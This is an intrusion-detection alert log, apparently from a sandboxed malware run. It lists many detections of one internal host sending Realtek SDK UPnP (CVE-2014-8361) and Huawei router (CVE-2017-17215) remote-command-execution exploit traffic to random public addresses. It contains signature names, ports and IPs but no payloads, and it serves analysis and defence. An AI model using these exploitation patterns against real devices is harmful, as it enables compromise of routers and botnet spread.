                                                07/20/24-23:05:33.830272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009437215192.168.2.14157.104.80.16
                                                07/20/24-23:06:03.180597TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23601852869192.168.2.1477.177.17.23
                                                07/20/24-23:06:03.159645TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5755852869192.168.2.14101.243.190.245
                                                07/20/24-23:06:13.745204TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3647252869192.168.2.1420.132.200.6
                                                07/20/24-23:05:39.898078TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5171452869192.168.2.14113.16.251.217
                                                07/20/24-23:05:58.818179TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3922452869192.168.2.1442.223.143.55
                                                07/20/24-23:05:59.845937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4476652869192.168.2.14126.180.229.141
                                                07/20/24-23:05:37.447263TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25548452869192.168.2.14181.62.64.51
                                                07/20/24-23:05:42.245742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330037215192.168.2.14168.46.26.17
                                                07/20/24-23:06:27.853068TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615246452869192.168.2.14204.140.235.247
                                                07/20/24-23:05:56.994605TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614301452869192.168.2.14130.194.61.21
                                                07/20/24-23:05:37.455022TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5435452869192.168.2.1417.189.220.248
                                                07/20/24-23:05:56.056582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5388837215192.168.2.14146.146.12.149
                                                07/20/24-23:06:10.883252TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614939252869192.168.2.14175.129.157.75
                                                07/20/24-23:05:38.737127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3303452869192.168.2.1431.209.91.245
                                                07/20/24-23:06:01.927271TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5448652869192.168.2.14160.75.130.165
                                                07/20/24-23:06:05.124335TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24900252869192.168.2.14156.92.82.212
                                                07/20/24-23:06:19.742051TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6032452869192.168.2.14119.105.96.108
                                                07/20/24-23:05:57.037609TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5890052869192.168.2.14106.97.250.162
                                                07/20/24-23:05:58.149825TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613559852869192.168.2.14100.5.198.48
                                                07/20/24-23:05:59.265746TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615008452869192.168.2.14218.51.16.69
                                                07/20/24-23:06:19.714340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5260652869192.168.2.14141.143.83.70
                                                07/20/24-23:05:45.988990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5197037215192.168.2.1441.28.231.117
                                                07/20/24-23:06:09.682183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5572252869192.168.2.14221.183.121.151
                                                07/20/24-23:06:34.627679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4907052869192.168.2.14218.90.44.232
                                                07/20/24-23:06:01.325013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4099652869192.168.2.14142.195.29.141
                                                07/20/24-23:06:02.272030TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26024252869192.168.2.1452.18.183.9
                                                07/20/24-23:05:56.696368TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614605252869192.168.2.14175.105.64.16
                                                07/20/24-23:05:37.453720TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24031452869192.168.2.14135.6.251.247
                                                07/20/24-23:05:40.326086TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5415052869192.168.2.14125.85.162.236
                                                07/20/24-23:05:46.422378TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5147252869192.168.2.1491.116.209.39
                                                07/20/24-23:06:12.589035TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3577252869192.168.2.14169.101.195.68
                                                07/20/24-23:05:56.124566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3365437215192.168.2.1441.58.153.232
                                                07/20/24-23:05:40.413313TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5563252869192.168.2.1473.43.58.179
                                                07/20/24-23:05:47.477436TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4136452869192.168.2.14175.68.43.201
                                                07/20/24-23:05:52.575727TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23499052869192.168.2.1445.216.246.4
                                                07/20/24-23:05:58.395096TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614052452869192.168.2.14117.178.148.207
                                                07/20/24-23:06:12.647376TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24047252869192.168.2.14183.168.204.172
                                                07/20/24-23:06:03.480553TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4743052869192.168.2.14203.77.85.241
                                                07/20/24-23:06:11.328787TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615582252869192.168.2.14120.21.248.106
                                                07/20/24-23:05:33.859349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625237215192.168.2.14120.191.233.247
                                                07/20/24-23:05:47.382528TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614063452869192.168.2.1448.186.210.104
                                                07/20/24-23:05:34.644841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4423237215192.168.2.1441.219.3.184
                                                07/20/24-23:05:38.957923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959237215192.168.2.1467.61.31.157
                                                07/20/24-23:06:15.183242TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24607852869192.168.2.14170.158.29.228
                                                07/20/24-23:05:50.528919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717437215192.168.2.14197.118.220.163
                                                07/20/24-23:06:01.225424TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3539252869192.168.2.1496.223.224.178
                                                07/20/24-23:06:38.067768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4953852869192.168.2.14212.173.5.107
                                                07/20/24-23:05:56.058256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4558237215192.168.2.14157.141.242.98
                                                07/20/24-23:05:35.809155TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614576452869192.168.2.1447.85.1.133
                                                07/20/24-23:05:36.324297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839437215192.168.2.1481.154.48.7
                                                07/20/24-23:06:35.384402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3668652869192.168.2.14203.104.19.10
                                                07/20/24-23:05:36.327823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4843637215192.168.2.1496.132.102.53
                                                07/20/24-23:06:04.058070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4920237215192.168.2.14152.255.113.99
                                                07/20/24-23:05:58.922584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5924052869192.168.2.14125.131.87.203
                                                07/20/24-23:05:57.551205TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23484852869192.168.2.1489.30.212.13
                                                07/20/24-23:05:35.419591TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4497252869192.168.2.14134.226.59.80
                                                07/20/24-23:06:02.893558TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3292452869192.168.2.14168.67.89.55
                                                07/20/24-23:06:08.228618TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613927452869192.168.2.1497.37.34.141
                                                07/20/24-23:06:00.434474TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5043652869192.168.2.1412.150.40.173
                                                07/20/24-23:06:45.141052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764837215192.168.2.14197.250.171.230
                                                07/20/24-23:05:57.036645TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615360852869192.168.2.14161.171.80.80
                                                07/20/24-23:05:56.056582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5342637215192.168.2.14197.194.11.25
                                                07/20/24-23:06:18.910197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4480252869192.168.2.1432.193.142.20
                                                07/20/24-23:05:42.180899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327037215192.168.2.1441.71.69.6
                                                07/20/24-23:05:57.180627TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613297652869192.168.2.1443.249.97.34
                                                07/20/24-23:05:35.551930TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3712852869192.168.2.14178.154.163.217
                                                07/20/24-23:07:08.228937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4147852869192.168.2.14206.104.221.174
                                                07/20/24-23:05:52.478142TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25192252869192.168.2.1452.57.110.73
                                                07/20/24-23:05:58.772622TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614730252869192.168.2.14212.119.81.31
                                                07/20/24-23:05:40.451363TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24375052869192.168.2.14115.51.161.31
                                                07/20/24-23:05:48.756259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5420637215192.168.2.14157.136.202.82
                                                07/20/24-23:05:57.822070TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5779052869192.168.2.1437.27.29.149
                                                07/20/24-23:05:36.323712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947237215192.168.2.1444.253.113.189
                                                07/20/24-23:05:59.141842TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23863252869192.168.2.1447.203.133.138
                                                07/20/24-23:06:01.264639TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4523652869192.168.2.1494.132.77.54
                                                07/20/24-23:05:36.324397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3443837215192.168.2.14120.73.179.118
                                                07/20/24-23:06:01.260147TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3504452869192.168.2.14122.77.226.22
                                                07/20/24-23:05:37.440705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24832252869192.168.2.1457.131.227.3
                                                07/20/24-23:05:39.773172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233637215192.168.2.14157.175.88.48
                                                07/20/24-23:05:58.334968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4323452869192.168.2.14164.43.30.66
                                                07/20/24-23:05:56.433907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4406237215192.168.2.14197.75.72.223
                                                07/20/24-23:05:56.048573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6091237215192.168.2.14157.61.127.145
                                                07/20/24-23:06:33.244498TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4077452869192.168.2.14210.223.197.178
                                                07/20/24-23:06:32.739089TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23413452869192.168.2.14204.191.187.136
                                                07/20/24-23:06:03.378832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3711637215192.168.2.14197.49.44.239
                                                07/20/24-23:06:14.511508TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3459452869192.168.2.14150.164.92.90
                                                07/20/24-23:06:15.084045TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4284252869192.168.2.14145.163.35.151
                                                07/20/24-23:05:56.893579TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5971452869192.168.2.14179.5.84.190
                                                07/20/24-23:06:44.371373TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5383252869192.168.2.14216.251.94.215
                                                07/20/24-23:06:03.058977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4217452869192.168.2.1485.57.174.44
                                                07/20/24-23:06:01.173503TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4286452869192.168.2.14129.96.14.117
                                                07/20/24-23:06:16.731750TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614319452869192.168.2.1465.219.192.0
                                                07/20/24-23:05:35.797336TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613817652869192.168.2.1459.242.125.217
                                                07/20/24-23:05:38.951134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493037215192.168.2.14197.44.149.176
                                                07/20/24-23:05:57.134757TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614041252869192.168.2.14152.29.165.10
                                                07/20/24-23:05:59.339081TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614365452869192.168.2.1448.252.151.54
                                                07/20/24-23:05:39.678174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3539837215192.168.2.14157.155.242.238
                                                07/20/24-23:05:52.531304TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4031652869192.168.2.14189.133.191.207
                                                07/20/24-23:05:42.145992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4766837215192.168.2.14157.187.94.186
                                                07/20/24-23:05:52.485640TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5574852869192.168.2.1473.39.239.240
                                                07/20/24-23:05:56.318882TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3806452869192.168.2.14142.8.237.197
                                                07/20/24-23:05:38.540965TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5379052869192.168.2.1434.179.222.192
                                                07/20/24-23:05:59.692241TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615395052869192.168.2.14146.28.213.74
                                                07/20/24-23:05:52.515632TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5792652869192.168.2.1413.248.239.26
                                                07/20/24-23:06:41.550251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4553652869192.168.2.14166.83.55.183
                                                07/20/24-23:05:35.977626TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614490252869192.168.2.14116.137.1.46
                                                07/20/24-23:05:40.392392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4750652869192.168.2.14190.0.225.28
                                                07/20/24-23:05:39.839035TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614787452869192.168.2.1474.88.51.163
                                                07/20/24-23:06:17.589156TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23580052869192.168.2.14147.197.189.218
                                                07/20/24-23:05:45.817171TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3382252869192.168.2.1475.62.163.102
                                                07/20/24-23:06:09.635095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614906452869192.168.2.14165.159.158.239
                                                07/20/24-23:05:50.600216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777237215192.168.2.14157.234.113.1
                                                07/20/24-23:05:57.123864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23887452869192.168.2.14142.8.237.197
                                                07/20/24-23:05:36.009637TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614581652869192.168.2.14162.96.80.170
                                                07/20/24-23:06:01.244494TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614148852869192.168.2.14133.192.223.98
                                                07/20/24-23:06:40.767884TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25151052869192.168.2.1488.196.89.109
                                                07/20/24-23:06:01.354528TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615202052869192.168.2.14207.13.1.7
                                                07/20/24-23:05:58.384426TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615254852869192.168.2.1484.81.98.79
                                                07/20/24-23:06:55.227510TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23470452869192.168.2.1441.158.158.125
                                                07/20/24-23:06:05.139331TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613612252869192.168.2.144.180.124.77
                                                07/20/24-23:05:46.113321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872437215192.168.2.14157.89.20.175
                                                07/20/24-23:06:00.205029TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3476852869192.168.2.14128.104.3.159
                                                07/20/24-23:05:57.153869TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23780252869192.168.2.1417.219.48.33
                                                07/20/24-23:05:37.612114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3377852869192.168.2.14118.75.62.14
                                                07/20/24-23:05:36.323623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629437215192.168.2.14197.239.103.184
                                                07/20/24-23:05:59.068340TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614711652869192.168.2.1466.1.85.90
                                                07/20/24-23:05:52.507639TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4180052869192.168.2.14175.10.5.126
                                                07/20/24-23:05:36.532921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4002037215192.168.2.14107.101.21.133
                                                07/20/24-23:05:56.058256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4454837215192.168.2.14126.25.72.120
                                                07/20/24-23:05:39.404370TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5663452869192.168.2.1473.202.31.82
                                                07/20/24-23:05:36.328888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437437215192.168.2.1441.196.91.80
                                                07/20/24-23:06:01.318185TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614757452869192.168.2.14130.9.41.235
                                                07/20/24-23:06:01.949518TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614109052869192.168.2.1481.135.180.241
                                                07/20/24-23:05:52.486069TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24038452869192.168.2.14107.0.137.66
                                                07/20/24-23:05:57.518359TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23929452869192.168.2.14123.114.225.162
                                                07/20/24-23:05:59.355668TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615589052869192.168.2.14168.255.68.251
                                                07/20/24-23:05:37.489725TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5887652869192.168.2.1491.85.138.225
                                                07/20/24-23:05:45.359662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833437215192.168.2.14197.93.209.193
                                                07/20/24-23:06:45.487764TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5482052869192.168.2.14123.181.87.233
                                                07/20/24-23:05:36.325662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339037215192.168.2.14157.226.247.93
                                                07/20/24-23:05:45.447173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3382437215192.168.2.14157.64.114.224
                                                07/20/24-23:06:01.318185TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25508852869192.168.2.14137.7.11.114
                                                07/20/24-23:05:44.314673TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23416052869192.168.2.1453.151.134.25
                                                07/20/24-23:05:42.221844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536837215192.168.2.14157.68.206.93
                                                07/20/24-23:05:47.513130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3628052869192.168.2.14191.198.16.14
                                                07/20/24-23:06:48.642445TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614083652869192.168.2.14171.33.218.139
                                                07/20/24-23:06:02.017303TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5184652869192.168.2.1496.237.181.208
                                                07/20/24-23:06:24.734892TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23866852869192.168.2.1471.91.216.235
                                                07/20/24-23:06:00.163232TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25757052869192.168.2.1490.210.129.8
                                                07/20/24-23:05:48.788274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5758437215192.168.2.14197.195.110.143
                                                07/20/24-23:05:35.099074TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615913852869192.168.2.14145.229.168.132
                                                07/20/24-23:05:36.445837TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615999052869192.168.2.14159.166.244.164
                                                07/20/24-23:05:45.383849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3531637215192.168.2.14189.221.175.63
                                                07/20/24-23:05:50.515352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4977837215192.168.2.14157.42.25.123
                                                07/20/24-23:05:57.551205TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24681652869192.168.2.14210.208.204.245
                                                07/20/24-23:05:57.653975TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613820852869192.168.2.1439.213.19.113
                                                07/20/24-23:05:37.549791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5234052869192.168.2.14143.165.147.195
                                                07/20/24-23:05:57.797060TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3534652869192.168.2.14148.117.182.60
                                                07/20/24-23:05:58.955037TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23839252869192.168.2.14165.91.143.33
                                                07/20/24-23:05:36.338927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5506437215192.168.2.14157.26.125.186
                                                07/20/24-23:05:38.132424TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4938052869192.168.2.1469.157.13.224
                                                07/20/24-23:05:56.106041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5858437215192.168.2.1441.144.136.45
                                                07/20/24-23:05:57.002874TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4560452869192.168.2.1492.226.53.187
                                                07/20/24-23:06:02.324702TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5132252869192.168.2.14218.51.16.69
                                                07/20/24-23:05:42.134564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6067237215192.168.2.14157.131.240.41
                                                07/20/24-23:05:52.515632TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25893852869192.168.2.1460.143.208.198
                                                07/20/24-23:05:35.864699TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5685452869192.168.2.14212.160.183.244
                                                07/20/24-23:06:24.662240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5717252869192.168.2.14168.17.71.158
                                                07/20/24-23:06:02.066021TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615576252869192.168.2.14165.146.142.120
                                                07/20/24-23:05:39.365818TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5762452869192.168.2.1464.79.183.126
                                                07/20/24-23:05:35.853915TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4459452869192.168.2.14125.249.246.55
                                                07/20/24-23:05:58.354369TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5418852869192.168.2.14167.208.176.195
                                                07/20/24-23:05:36.327719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233037215192.168.2.14197.78.71.227
                                                07/20/24-23:05:52.468494TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4385852869192.168.2.148.32.165.235
                                                07/20/24-23:06:29.745087TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6052652869192.168.2.14143.21.232.22
